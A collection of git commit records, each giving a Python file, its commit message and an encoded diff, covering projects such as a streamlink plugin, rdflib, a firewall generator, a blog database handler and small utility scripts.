self.state['replset'] = set_name
def load_state(self, replset):
self.state = self.merge(replset, self.state)
class StateBackupReplset(StateBaseReplset):
def __init__(self, base_dir, config, backup_time, set_name):
StateBaseReplset.__init__(self, base_dir, config, backup_time, set_name, "replset.bson")
class StateOplog(StateBaseReplset):
def __init__(self, base_dir, config, backup_time, set_name):
StateBaseReplset.__init__(self, base_dir, config, backup_time, set_name, "oplog.bson")
class StateBackup(StateBase):
def __init__(self, base_dir, config, backup_time, seed_uri, argv=None):
StateBase.__init__(self, base_dir, config)
self.base_dir = base_dir
self.state['backup'] = True
self.state['name'] = backup_time
self.state['method'] = config.backup.method
self.state['path'] = base_dir
self.state['cmdline'] = argv
self.state['config'] = config.dump()
self.state['version'] = config.version
self.state['git_commit'] = config.git_commit
self.state['host'] = {
'hostname': platform.node(),
'uname': platform.uname(),
'python': {
'build': platform.python_build(),
'version': platform.python_version()
}
}
self.state['seed'] = {
'uri': seed_uri.str(),
'replset': seed_uri.replset
}
self.init()
def init(self):
logging.info("Initializing backup state directory: %s" % self.base_dir)
def set(self, name, summary):
self.state[name] = summary
self.write(True)
class StateRoot(StateBase):
def __init__(self, base_dir, config):
StateBase.__init__(self, base_dir, config)
self.base_dir = base_dir
self.state['root'] = True
self.init()
def init(self):
logging.info("Initializing root state directory %s" % self.base_dir)
self.load_backups()
def load_backups(self):
backups = []
if os.path.isdir(self.base_dir):
for subdir in os.listdir(self.base_dir):
try:
bkp_path = os.path.join(self.base_dir, subdir)
if subdir == self.meta_name or os.path.islink(bkp_path):
continue
state_path = os.path.join(bkp_path, self.meta_name)
state_file = os.path.join(state_path, "meta.bson")
done_path = os.path.join(state_path, "done.bson")
if os.path.isdir(state_path) and os.path.isfile(state_file) and os.path.isfile(done_path):
backups.append(state_file)
except:
continue
logging.info("Found %i existing completed backups for set" % len(backups))
return backups
class StateDoneStamp(StateBase):
def __init__(self, base_dir, config):
StateBase.__init__(self, base_dir, config, "done.bson")
self.state = {'done': True}
|
Python
| 0.999999
|
@@ -879,17 +879,20 @@
try
-recursive
+normal mkdir
fir
@@ -913,19 +913,46 @@
o re
-gular mkdir
+cursive mkdir if there is an exception
%0A
@@ -989,15 +989,12 @@
os.m
-ake
+k
dir
-s
(sel
@@ -1063,36 +1063,39 @@
os.m
-k
+ake
dir
+s
(self.state_dir)
|
471d1d4ae197c7643eeac374a0353adbce54fd44
|
add scheme to grabber api url if not present
|
src/streamlink/plugins/nineanime.py
|
src/streamlink/plugins/nineanime.py
|
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import http
from streamlink.plugin.api import validate
from streamlink.stream import HTTPStream
class NineAnime(Plugin):
_episode_info_url = "http://9anime.to/ajax/episode/info"
_info_schema = validate.Schema({
"grabber": validate.url(),
"params": {
"id": validate.text,
"token": validate.text,
"options": validate.text,
}
})
_streams_schema = validate.Schema({
"token": validate.text,
"error": None,
"data": [{
"label": validate.text,
"file": validate.url(),
"type": "mp4"
}]
})
_user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "\
"Chrome/36.0.1944.9 Safari/537.36"
_url_re = re.compile(r"https?://9anime.to/watch/(?:[^.]+?\.)(\w+)/(\w+)")
@classmethod
def can_handle_url(cls, url):
return cls._url_re.match(url) is not None
def _get_streams(self):
match = self._url_re.match(self.url)
film_id, episode_id = match.groups()
headers = {
"Referer": self.url,
"User-Agent": self._user_agent
}
# Get the info about the Episode, including the Grabber API URL
info_res = http.get(self._episode_info_url,
params=dict(update=0, film=film_id, id=episode_id),
headers=headers)
info = http.json(info_res, schema=self._info_schema)
# Get the data about the streams from the Grabber API
stream_list_res = http.get(info["grabber"], params=info["params"], headers=headers)
stream_data = http.json(stream_list_res, schema=self._streams_schema)
for stream in stream_data["data"]:
yield stream["label"], HTTPStream(self.session, stream["file"])
__plugin__ = NineAnime
|
Python
| 0
|
@@ -79,16 +79,61 @@
rt http%0A
+from streamlink.plugin.api import useragents%0A
from str
@@ -208,16 +208,55 @@
PStream%0A
+from streamlink.compat import urlparse%0A
%0A%0Aclass
@@ -303,13 +303,8 @@
= %22
-http:
//9a
@@ -783,154 +783,8 @@
%7D)%0A%0A
- _user_agent = %22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) %22%5C%0A %22Chrome/36.0.1944.9 Safari/537.36%22%0A
@@ -960,16 +960,227 @@
t None%0A%0A
+ def add_scheme(self, url):%0A # update the scheme for the grabber url if required%0A if url.startswith(%22//%22):%0A url = %22%7B0%7D:%7B1%7D%22.format(urlparse(self.url).scheme, url)%0A return url%0A%0A
def
@@ -1373,24 +1373,26 @@
t%22:
-self._
user
-_
agent
+s.FIREFOX
%0A
@@ -1504,16 +1504,32 @@
et(self.
+add_scheme(self.
_episode
@@ -1537,16 +1537,17 @@
info_url
+)
,%0A
@@ -1789,16 +1789,71 @@
ber API%0A
+ grabber_url = self.add_scheme(info%5B%22grabber%22%5D)%0A
@@ -1879,31 +1879,27 @@
ttp.get(
-info%5B%22
grabber
-%22%5D
+_url
, params
|
d965740b6e0021686b284d164a1eddd17519244a
|
set version to 4.2.0 for release
|
rdflib/__init__.py
|
rdflib/__init__.py
|
"""\
A pure Python package providing the core RDF constructs.
The packages is intended to provide the core RDF types and interfaces
for working with RDF. The package defines a plugin interface for
parsers, stores, and serializers that other packages can use to
implement parsers, stores, and serializers that will plug into the
rdflib package.
The primary interface `rdflib` exposes to work with RDF is
`rdflib.graph.Graph`.
A tiny example:
>>> import rdflib
>>> g = rdflib.Graph()
>>> result = g.parse("http://www.w3.org/2000/10/swap/test/meet/blue.rdf")
>>> print("graph has %s statements." % len(g))
graph has 9 statements.
>>>
>>> for s, p, o in g:
... if (s, p, o) not in g:
... raise Exception("It better be!")
>>> s = g.serialize(format='n3')
"""
__docformat__ = "restructuredtext en"
# The format of the __version__ line is matched by a regex in setup.py
__version__ = "4.2.0-dev"
__date__ = "2015/01/07"
__all__ = [
'URIRef',
'BNode',
'Literal',
'Variable',
'Namespace',
'Dataset',
'Graph',
'ConjunctiveGraph',
'RDF',
'RDFS',
'OWL',
'XSD',
'util',
]
import sys
assert sys.version_info >= (2, 5, 0), "rdflib requires Python 2.5 or higher"
del sys
import logging
import __main__
if not hasattr(__main__, '__file__'):
# show log messages in interactive mode
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.info("RDFLib Version: %s" % __version__)
try:
unichr(0x10FFFF)
except ValueError:
import warnings
warnings.warn(
'You are using a narrow Python build!\n'
'This means that your Python does not properly support chars > 16bit.\n'
'On your system chars like c=u"\\U0010FFFF" will have a len(c)==2.\n'
'As this can cause hard to debug problems with string processing\n'
'(slicing, regexp, ...) later on, we strongly advise to use a wide\n'
'Python build in production systems.',
ImportWarning)
del warnings
NORMALIZE_LITERALS = True
"""
If True - Literals lexical forms are normalized when created.
I.e. the lexical forms is parsed according to data-type, then the
stored lexical form is the re-serialized value that was parsed.
Illegal values for a datatype are simply kept. The normalized keyword
for Literal.__new__ can override this.
For example:
>>> from rdflib import Literal,XSD
>>> Literal("01", datatype=XSD.int)
rdflib.term.Literal(u'1', datatype=rdflib.term.URIRef(u'http://www.w3.org/2001/XMLSchema#integer'))
This flag may be changed at any time, but will only affect literals
created after that time, previously created literals will remain
(un)normalized.
"""
DAWG_LITERAL_COLLATION = False
"""
DAWG_LITERAL_COLLATION determines how literals are ordered or compared
to each other.
In SPARQL, applying the >,<,>=,<= operators to literals of
incompatible data-types is an error, i.e:
Literal(2)>Literal('cake') is neither true nor false, but an error.
This is a problem in PY3, where lists of Literals of incompatible
types can no longer be sorted.
Setting this flag to True gives you strict DAWG/SPARQL compliance,
setting it to False will order Literals with incompatible datatypes by
datatype URI
In particular, this determines how the rich comparison operators for
Literal work, eq, __neq__, __lt__, etc.
"""
from rdflib.term import (
URIRef, BNode, Literal, Variable)
from rdflib.namespace import Namespace
from rdflib.graph import Dataset, Graph, ConjunctiveGraph
from rdflib.namespace import RDF, RDFS, OWL, XSD
from rdflib import plugin
from rdflib import query
# tedious sop to flake8
assert plugin
assert query
from rdflib import util
|
Python
| 0
|
@@ -941,12 +941,8 @@
.2.0
--dev
%22%0A__
@@ -961,12 +961,12 @@
15/0
-1/07
+2/19
%22%0A%0A_
|
bbbddd3d505f18759b509442238cd492f420a142
|
Fix ordered_dict_merge rename error
|
fwgen/fwgen_cmd.py
|
fwgen/fwgen_cmd.py
|
import argparse
import signal
import sys
import subprocess
from collections import OrderedDict
from pkg_resources import resource_filename
import yaml
import fwgen
# Python 2.7 compatibility
try:
input = raw_input
except NameError:
pass
class TimeoutExpired(Exception):
pass
def alarm_handler(signum, frame):
raise TimeoutExpired
def wait_for_input(message, timeout):
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(timeout)
try:
return input(message)
finally:
# Cancel alarm
signal.alarm(0)
def ordered_dict_merge(d1, d2):
"""
Deep merge d1 into d2
"""
for k, v in d1.items():
if isinstance(v, OrderedDict):
node = d2.setdefault(k, OrderedDict())
dict_merge(v, node)
else:
d2[k] = v
return d2
def yaml_load_ordered(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict):
class OrderedLoader(Loader):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
return yaml.load(stream, OrderedLoader)
def _main():
parser = argparse.ArgumentParser()
parser.add_argument('--config', metavar='PATH', help='Override path to config file')
parser.add_argument('--defaults', metavar='PATH', help='Override path to defaults file')
parser.add_argument(
'--with-reset',
action='store_true',
help='Clear the firewall before reapplying. Recommended only if ipsets in '
'use are preventing you from applying the new configuration.'
)
mutex_group = parser.add_mutually_exclusive_group()
mutex_group.add_argument('--timeout', metavar='SECONDS', type=int,
help='Override timeout for rollback')
mutex_group.add_argument(
'--no-confirm',
action='store_true',
help="Don't ask for confirmation before storing ruleset"
)
args = parser.parse_args()
defaults = resource_filename(__name__, 'etc/defaults.yml')
if args.defaults:
defaults = args.defaults
user_config = '/etc/fwgen/config.yml'
if args.config:
user_config = args.config
try:
with open(defaults, 'r') as f:
config = yaml_load_ordered(f)
with open(user_config, 'r') as f:
config = ordered_dict_merge(yaml_load_ordered(f), config)
except FileNotFoundError as e:
print('ERROR: %s' % e)
sys.exit(3)
fw = fwgen.FwGen(config)
if args.with_reset:
fw.reset()
if args.no_confirm:
fw.commit()
else:
timeout = 30
if args.timeout:
timeout = args.timeout
print('\nRolling back in %d seconds if not confirmed.\n' % timeout)
fw.apply()
message = ('The ruleset has been applied successfully! Press \'Enter\' to make the '
'new ruleset persistent.\n')
try:
wait_for_input(message, timeout)
fw.save()
except (TimeoutExpired, KeyboardInterrupt):
print('No confirmation received. Rolling back...\n')
fw.rollback()
def main():
try:
sys.exit(_main())
except subprocess.CalledProcessError as e:
print('ERROR: %s' % e)
sys.exit(1)
except fwgen.InvalidChain as e:
print('ERROR: %s' % e)
sys.exit(2)
except KeyboardInterrupt:
print('ERROR: Aborted by user!')
sys.exit(130)
|
Python
| 0.000001
|
@@ -764,16 +764,24 @@
+ordered_
dict_mer
|
566e3e9140ef96d58aaa4bfc0f89d9429a978485
|
add a script to get connections between the minima
|
get_connections.py
|
get_connections.py
|
Python
| 0
|
@@ -0,0 +1,626 @@
+from lj_run import LJClusterNew%0Aimport sys%0Afrom pygmin.landscape import Graph%0A%0Anatoms = int(sys.argv%5B1%5D)%0Adbname = sys.argv%5B2%5D%0A%0Asystem = LJClusterNew(natoms)%0Adb = system.create_database(dbname)%0A%0Awhile True:%0A min1 = db.minima()%5B0%5D%0A%0A graph = Graph(db)%0A%0A all_connected = True%0A for m2 in db.minima()%5B1:%5D:%0A if not graph.areConnected(min1, m2):%0A all_connected = False%0A break%0A if all_connected:%0A print %22minima are all connected, ending%22%0A exit(1) %0A%0A connect = system.get_double_ended_connect(min1, m2, db, fresh_connect=True, load_no_distances=True)%0A connect.connect()%0A%0A%0A
|
|
72b701652271178e08d9cccd088d24177d4a2fc6
|
Add functions for storing/getting blogs and posts
|
pyblogit/database_handler.py
|
pyblogit/database_handler.py
|
Python
| 0
|
@@ -0,0 +1,2237 @@
+%22%22%22%0Apyblogit.database_handler%0A~~~~~~~~~~~~~~~~~~~~~~~~~%0A%0AThis module handles the connection and manipulation of the local database.%0A%22%22%22%0Aimport sqlite3%0A%0A%0Adef get_cursor(blog_id):%0A %22%22%22Connects to a local sqlite database%22%22%22%0A conn = sqlite3.connect(blog_id)%0A c = conn.cursor()%0A%0A return c%0A%0A%0Adef add_blog(blog_id, blog_name):%0A %22%22%22Adds a new blog to the local blogs database and%0A creates a new database for the blog.%22%22%22%0A # These two statements create the database files if%0A # they don't exist.%0A c = get_cursor('blogs')%0A blog_c = get_cursor(blog_id)%0A%0A # Check if blogs table exists, if it doesn't create it.%0A exists = bool(c.execute('SELECT name FROM sqlite_master WHERE type=%22table%22%0A AND name=%22blogs%22'))%0A%0A if not exists:%0A c.execute('CREATE TABLE blogs(blog_id INT, blog_name TEXT)')%0A%0A sql = ('INSERT INTO blogs(blog_id, blog_name) values(%7Bblog_id%7D,%0A %7Bblog_name%7D)'.format(blog_id=blog_id, blog_name=blog_name))%0A%0A c.execute(sql)%0A%0A # Create table to store posts in new blog's database.%0A blog_c.execute('CREATE TABLE posts(post_id INT, title TEXT, url TEXT,%0A status TEXT, content TEXT, updated INT)')%0A%0A%0Adef get_blogs():%0A %22%22%22Returns all stored blogs.%22%22%22%0A c = get_cursor('blogs')%0A blogs = c.execute('SELECT * FROM blogs')%0A%0A return blogs%0A%0A%0Adef get_post(blog_id, post_id):%0A %22%22%22Retrieves a post from a local database.%22%22%22%0A c = get_cursor(blog_id)%0A sql = 'SELECT * FROM posts WHERE post_id = %7Bp_id%7D'.format(p_id=post_id)%0A%0A c.execute(sql)%0A%0A post = c.fetchone()%0A%0A return post%0A%0A%0Adef get_posts(blog_id, limit=None):%0A %22%22%22Retrieves all the posts from a local database, if a limit%0A is specified, it will retrieve up to that amount of posts.%22%22%22%0A c = get_cursor(blog_id)%0A sql = 'SELECT * FROM posts'%0A%0A if limit:%0A limit = 'LIMIT %7Blim%7D'.format(lim=limit)%0A sql = ''.join(%5Bsql, limit%5D)%0A%0A c.execute(sql)%0A%0A posts = c.fetchall()%0A%0A return posts%0A%0A%0Adef update_post(blog_id, post_id, post):%0A # TODO: update post in local database%0A pass%0A%0A%0Adef add_post(blog_id, post):%0A # TODO: insert new post in local database%0A pass%0A
|
|
726316b50209dfc5f6a8f6373cd7e3f53e267bb3
|
Implement a genre string parser
|
geodj/genre_parser.py
|
geodj/genre_parser.py
|
Python
| 0.999999
|
@@ -0,0 +1,1102 @@
+import re%0Afrom django.utils.encoding import smart_str%0A%0Aclass GenreParser:%0A @staticmethod%0A def parse(genre):%0A genre = smart_str(genre).lower()%0A if re.search(r%22%5Cb(jazz%7Cblues)%5Cb%22, genre):%0A return %22jazz%22%0A if re.search(r%22%5Cb(ska%7Creggae%7Cragga%7Cdub)%5Cb%22, genre):%0A return %22ska%22%0A elif re.search(r%22%5Cb(r&b%7Cfunk%7Csoul)%5Cb%22, genre):%0A return %22r&b%22%0A elif re.search(r%22%5Cbfolk%5Cb%22, genre):%0A return %22folk%22%0A elif re.search(r%22%5Cb(country%7Cbluegrass)%5Cb%22, genre):%0A return %22country%22%0A elif re.search(r%22%5Cb(rap%7Chip hop%7Ccrunk%7Ctrip hop)%5Cb%22, genre):%0A return %22hiphop%22%0A elif re.search(r%22%5Cbpop%5Cb%22, genre):%0A return %22pop%22%0A elif re.search(r%22%5Cb(rock%7Cmetal%7Cpunk)%5Cb%22, genre):%0A return %22rock%22%0A elif re.search(r%22%5Cb(electronic%7Celectronica%7Celectro%7Chouse%7Ctechno%7Cambient%7Cchiptune%7Cindustrial%7Cdowntempo%7Cdrum and bass%7Ctrance%7Cdubstep)%5Cb%22, genre):%0A return %22electronic%22%0A elif re.search(r%22%5Cb(classical%7Corchestra%7Copera%7Cpiano%7Cviolin%7Ccello)%5Cb%22, genre):%0A return %22classical%22%0A
|
|
23402487a2b12aca391bb5958b4ba3e9424a6801
|
Add a new management command 'olccperiodic' to update the 'on_sale' property for all products.
|
django_olcc/olcc/management/commands/olccperiodic.py
|
django_olcc/olcc/management/commands/olccperiodic.py
|
Python
| 0
|
@@ -0,0 +1,2127 @@
+import datetime%0A%0Afrom django.core.management.base import BaseCommand%0Afrom django.db import IntegrityError, transaction%0Afrom olcc.models import Product, ProductPrice%0Afrom optparse import make_option%0A%0Aclass Command(BaseCommand):%0A help = %22%22%22%5C%0A A command to be run periodically to calculate Product status%0A from updated price data.%0A%0A Currently this command iterates over all product records and%0A toggles the 'on_sale' property if the item's price has dropped%0A since last month.%22%22%22%0A%0A option_list = BaseCommand.option_list + (%0A make_option('--quiet', action='store_true', dest='quiet',%0A default=False, help='Suppress all output except errors'),%0A )%0A%0A def uprint(self, msg):%0A %22%22%22%0A Unbuffered print.%0A %22%22%22%0A if not self.quiet:%0A self.stdout.write(%22%25s%5Cn%22 %25 msg)%0A self.stdout.flush()%0A%0A @transaction.commit_on_success%0A def handle(self, *args, **options):%0A self.quiet = options.get('quiet', False)%0A%0A # Get today's date%0A today = datetime.date.today()%0A%0A # Get the first of this month%0A this_month = today.replace(day=1)%0A%0A # Get the first of last month%0A try:%0A last_month = today.replace(month=today.month-1, day=1)%0A except ValueError:%0A if today.month == 1:%0A last_month = today.replace(year=today.year-1, month=12, day=1)%0A%0A # Update the on sale flag for all products%0A count = 0%0A for p in Product.objects.all().order_by('title'):%0A try:%0A current_price = p.prices.get(effective_date=this_month)%0A previous_price = p.prices.get(effective_date=last_month)%0A%0A if current_price.amount %3C previous_price.amount:%0A p.on_sale = True%0A%0A self.uprint('%5BSALE%5D: %25s' %25 p)%0A count += 1%0A else:%0A p.on_sale = False%0A%0A # Persist our changes%0A p.save()%0A except ProductPrice.DoesNotExist:%0A pass%0A%0A self.uprint('%5Cn%25s items have dropped in price!' %25 count)%0A
|
|
860d81ec5f0b9ae4c28a1996773c06240c31b67a
|
Update names
|
canvas.py
|
canvas.py
|
Python
| 0.000001
|
@@ -0,0 +1,1476 @@
+#!/usr/bin/env python3%0Afrom tkinter import *%0Afrom tkinter import ttk%0Aimport math%0A%0Aclass App:%0A def __init__(self):%0A self.lastx = 0%0A self.lasty = 0%0A self.fill = 'red'%0A self.width = 2%0A%0A root = Tk()%0A root.columnconfigure(0, weight=1)%0A root.rowconfigure(0, weight=1)%0A%0A self.canvas = Canvas(root)%0A self.canvas.grid(column=0, row=0, sticky=(N, W, E, S))%0A self.canvas.bind(%22%3CButton-1%3E%22, self.xy)%0A self.canvas.bind(%22%3CB1-Motion%3E%22, self.addLine)%0A%0A # with Windows%0A self.canvas.bind(%22%3CMouseWheel%3E%22, self.changeWidth)%0A # with Linux OS%0A self.canvas.bind(%22%3CButton-4%3E%22, self.changeWidth)%0A self.canvas.bind(%22%3CButton-5%3E%22, self.changeWidth)%0A%0A root.mainloop()%0A%0A def xy(self, event):%0A self.lastx, self.lasty = event.x, event.y%0A%0A def changeWidth(self, event):%0A # Why?%0A if event.num == 5 or event.delta == -120:%0A self.width = max(1, self.width - 1)%0A # Why? What is the significance of 4 and 5?%0A if event.num == 4 or event.delta == 120:%0A self.width = min(500, self.width + 1)%0A%0A def addLine(self, event):%0A if self.fill == 'red':%0A self.fill = 'blue'%0A else:%0A self.fill = 'red'%0A self.canvas.create_line(%0A self.lastx, self.lasty, event.x, event.y,%0A fill=self.fill, width=math.floor(self.width))%0A self.lastx, self.lasty = event.x, event.y%0A%0AApp()%0A
|
|
d5c7d429be93a2b2de4a1c09bd73f72c02664499
|
Move win32 audio experiment to trunk.
|
experimental/directshow.py
|
experimental/directshow.py
|
Python
| 0
|
@@ -0,0 +1,1524 @@
+#!/usr/bin/python%0D%0A# $Id:$%0D%0A%0D%0A# Play an audio file with DirectShow. Tested ok with MP3, WMA, MID, WAV, AU.%0D%0A# Caveats:%0D%0A# - Requires a filename (not from memory or stream yet). Looks like we need%0D%0A# to manually implement a filter which provides an output IPin. Lot of%0D%0A# work.%0D%0A# - Theoretically can traverse the graph to get the output filter, which by%0D%0A# default is supposed to implement IDirectSound3DBuffer, for positioned%0D%0A# sounds. Untested.%0D%0A# - Requires comtypes. Can work around this in future by implementing the%0D%0A# small subset of comtypes ourselves (or including a snapshot of comtypes in%0D%0A# pyglet).%0D%0A%0D%0Aimport ctypes%0D%0Afrom comtypes import client%0D%0Aimport sys%0D%0Aimport time%0D%0A%0D%0Afilename = sys.argv%5B1%5D%0D%0A%0D%0Aqedit = client.GetModule('qedit.dll') # DexterLib%0D%0Aquartz = client.GetModule('quartz.dll') # %0D%0A%0D%0ACLSID_FilterGraph = '%7Be436ebb3-524f-11ce-9f53-0020af0ba770%7D'%0D%0A%0D%0Afilter_graph = client.CreateObject(CLSID_FilterGraph,%0D%0A interface=qedit.IFilterGraph)%0D%0Afilter_builder = filter_graph.QueryInterface(qedit.IGraphBuilder)%0D%0Afilter_builder.RenderFile(filename, None)%0D%0A%0D%0Amedia_control = filter_graph.QueryInterface(quartz.IMediaControl)%0D%0Amedia_control.Run()%0D%0A%0D%0Atry:%0D%0A # Look at IMediaEvent interface for EOS notification%0D%0A while True:%0D%0A time.sleep(1)%0D%0Aexcept KeyboardInterrupt:%0D%0A pass%0D%0A%0D%0A# Need these because finalisers don't have enough context to clean up after%0D%0A# themselves when script exits.%0D%0Adel media_control%0D%0Adel filter_builder%0D%0Adel filter_graph%0D%0A
|
|
285c852bb246042a4f882ab9ca2948e4f0241dac
|
add GTC.meshgrid Core
|
src/processors/GTC/meshgrid.py
|
src/processors/GTC/meshgrid.py
|
Python
| 0.000001
|
@@ -0,0 +1,1838 @@
+# -*- coding: utf-8 -*-%0A%0A# Copyright (c) 2018 shmilee%0A%0A'''%0ASource fortran code:%0A%0Av110922%0A-------%0A%0Adiagnosis.F90, subroutine diagnosis:37-50%0A !!diagnosis xy%0A if(mype==1)then%0A open(341,file='meshgrid.out',status='replace')%0A do i=0,mpsi%0A write(341,*)psimesh(i)%0A write(341,*)sprpsi(psimesh(i))%0A write(341,*)qmesh(i)%0A write(341,*)kapatmti(i)%0A write(341,*)kapatmte(i)%0A write(341,*)kapatmni(i)%0A write(341,*)kapatmne(i)%0A enddo%0A close(341)%0A endif%0A%0A'''%0A%0Aimport numpy%0Afrom ..basecore import BaseCore, log%0A%0A__all__ = %5B'MeshgridCoreV110922'%5D%0A%0A%0Aclass MeshgridCoreV110922(BaseCore):%0A '''%0A Meshgrid data%0A%0A 1) psimesh, sprpsi, qmesh, kapatmti, kapatmte, kapatmni, kapatmne%0A Shape of the array data is (mpsi+1,).%0A '''%0A __slots__ = %5B%5D%0A instructions = %5B'dig'%5D%0A filepatterns = %5B'%5E(?P%3Cgroup%3Emeshgrid)%5C.out$',%0A '.*/(?P%3Cgroup%3Emeshgrid)%5C.out$'%5D%0A grouppattern = '%5Emeshgrid$'%0A _datakeys = (%0A 'psimesh', 'sprpsi', 'qmesh',%0A 'kapatmti', 'kapatmte', 'kapatmni', 'kapatmne')%0A%0A def _dig(self):%0A '''Read 'meshgrid.out'.'''%0A with self.rawloader.get(self.file) as f:%0A log.ddebug(%22Read file '%25s'.%22 %25 self.file)%0A outdata = f.readlines()%0A%0A sd = %7B%7D%0A shape = (7, len(outdata) // 7)%0A outdata = outdata%5B:len(outdata) // 7 * 7%5D%0A if len(outdata) %25 7 != 0:%0A log.warn(%22Missing some raw data in '%25s'! Guess the shape '%25s'.%22%0A %25 (self.file, shape))%0A%0A log.debug(%22Filling datakeys: %25s ...%22 %25 str(self._datakeys%5B:%5D))%0A outdata = numpy.array(%5Bfloat(n.strip()) for n in outdata%5D)%0A outdata = outdata.reshape(shape, order='F')%0A for i, key in enumerate(self._datakeys):%0A sd.update(%7Bkey: outdata%5Bi%5D%7D)%0A%0A return sd%0A
|
|
e731bfdabbf42b636b02e93ccd3b67c55a28d213
|
add unit test
|
axelrod/tests/test_appeaser.py
|
axelrod/tests/test_appeaser.py
|
Python
| 0.000001
|
@@ -0,0 +1,579 @@
+%22%22%22%0ATest for the appeaser strategy%0A%22%22%22%0Aimport unittest%0Aimport axelrod%0A%0Aclass TestAppeaser(unittest.TestCase):%0A%0A def test_strategy(self):%0A P1 = axelrod.Appeaser()%0A P2 = axelrod.Player()%0A%09P1.str = 'C';%0A self.assertEqual(P1.strategy(P2), 'C')%0A%09P1.history = %5B'C'%5D%0A%09P1.history = %5B'C'%5D%0A%09self.assertEqual(P1.strategy(P2), 'C')%0A P1.history = %5B'C', 'D', 'C'%5D%0A P2.history = %5B'C', 'C', 'D'%5D%0A self.assertEqual(P1.strategy(P2), 'D')%0A%0A def test_representation(self):%0A P1 = axelrod.Appeaser()%0A self.assertEqual(str(P1), 'Appeaser')%0A
|
|
0a0d31077746e69bf5acc7d90fa388e121544339
|
Add skeleton for new python scripts.
|
script_skeleton.py
|
script_skeleton.py
|
Python
| 0
|
@@ -0,0 +1,982 @@
+#!/usr/bin/python%0A%0A%22%22%22Usage:%0A %3CSCRIPT_NAME%3E %5B--log-level=%3Clog-level%3E%5D%0A%0A-h --help%0A Show this message.%0A-v --version%0A Show version.%0A--log-level=%3Clog-level%3E%0A Set logging level (one of %7Blog_level_vals%7D) %5Bdefault: info%5D.%0A%22%22%22%0A%0Aimport docopt%0Aimport ordutils.log as log%0Aimport ordutils.options as opt%0Aimport schema%0Aimport sys%0A%0ALOG_LEVEL = %22--log-level%22%0ALOG_LEVEL_VALS = str(log.LEVELS.keys())%0A%0A%0Adef validate_command_line_options(options):%0A # Validate command-line options%0A try:%0A opt.validate_dict_option(%0A options%5BLOG_LEVEL%5D, log.LEVELS, %22Invalid log level%22)%0A except schema.SchemaError as exc:%0A exit(exc.code)%0A%0A%0Adef main(docstring):%0A # Read in and validate command line options%0A options = docopt.docopt(docstring, version=%22%3CSCRIPT_NAME%3E v0.1%22)%0A validate_command_line_options(options)%0A%0A # Set up logger%0A logger = log.getLogger(sys.stderr, options%5BLOG_LEVEL%5D)%0A%0A # Rest of script...%0A%0A%0Aif __name__ == %22__main__%22:%0A main(__doc__)%0A
|
|
63b954c952dda9d123e6fa1e348babae97523e21
|
Create securitygroup.py
|
azurecloudify/securitygroup.py
|
azurecloudify/securitygroup.py
|
Python
| 0.000001
|
@@ -0,0 +1 @@
+%0A
|
|
ac78f3f774dbfda4e2c96786ddebf74066a56f54
|
add mtbf_job_runner
|
mtbf_job_runner.py
|
mtbf_job_runner.py
|
Python
| 0.000004
|
@@ -0,0 +1,573 @@
+#!/usr/bin/env python%0Aimport combo_runner.action_decorator%0Afrom combo_runner.base_action_runner import BaseActionRunner%0Afrom utils.zip_utils import modify_zipfile%0Aimport os%0A%0A%0Aclass MtbfJobRunner(BaseActionRunner):%0A%0A action = combo_runner.action_decorator.action%0A%0A def pre_flash(self):%0A pass%0A%0A def flash(self):%0A pass%0A%0A def post_flash(self):%0A pass%0A%0A# @action%0A def add_7mobile_action(self, action=False):%0A # require import gaia_data_layer to call setSettings%0A%0A%0A%0Aif __name__ == '__main__':%0A MtbfJobRunner().add_7mobile_action()%0A
|
|
f5bb497960f9f9256cc9794baf0c53c4ba5d734f
|
Add Spider class for web crawling.
|
Spider.py
|
Spider.py
|
Python
| 0
|
@@ -0,0 +1,112 @@
+'''%0D%0ACreated on 7/07/2016%0D%0A%0D%0A@author: garet%0D%0A'''%0D%0A%0D%0Aclass Spider():%0D%0A %0D%0A def __init__(self):%0D%0A pass
|
|
8c8d28e95cf99f8aff4ba45819b08995ef63ea44
|
add hubble
|
hubble.py
|
hubble.py
|
Python
| 0.998455
|
@@ -0,0 +1,977 @@
+import urllib%0Aimport os%0A%0Adef fetchImages(start, stop):%0A counter = 0%0A imgIndex = start%0A for i in range(start, start+stop+1):%0A urllib.urlretrieve(%22%22+str(imgIndex)+%22.jpg%22, str(imgIndex)+%22.jpg%22)%0A print(%22Image# %22+str(counter)+%22 of %22+str(stop)+%22 captured.%22)%0A counter += 1%0A imgIndex += 1%0A print(%22Finished%22)%0A%0Adef pathFolder():%0A cur_folder = os.getcwd()%0A if not os.path.exists(cur_folder+%22/space/hubble/%22):%0A print(%22Wait.. Folder not found!%5Cn%22)%0A print(%22Creating a new folder...%5Cn%22)%0A os.makedirs(cur_folder+%22/space/hubble/%22)%0A os.chdir(cur_folder+%22/space/hubble/%22)%0A else:%0A os.chdir(cur_folder+%22/space/hubble/%22)%0A%0Adef main():%0A print(%22Random Images Capture from Hubble Telescope%5Cn%22)%0A start = raw_input(%22Pick a random number?:%5Cn%22)%0A stop = raw_input(%22How many images do you want to download?: %22)%0A print(%22Capturing images...%5Cn%22)%0A pathFolder()%0A fetchImages(int(start), int(stop))%0A%0Amain()%0A
|
|
62296474a389f684dbc1b66fb5256d494111b7c9
|
Add a script to reproduce ezio issue #4
|
SocketABC/ezio_issue4_reproduce.py
|
SocketABC/ezio_issue4_reproduce.py
|
Python
| 0
|
@@ -0,0 +1,675 @@
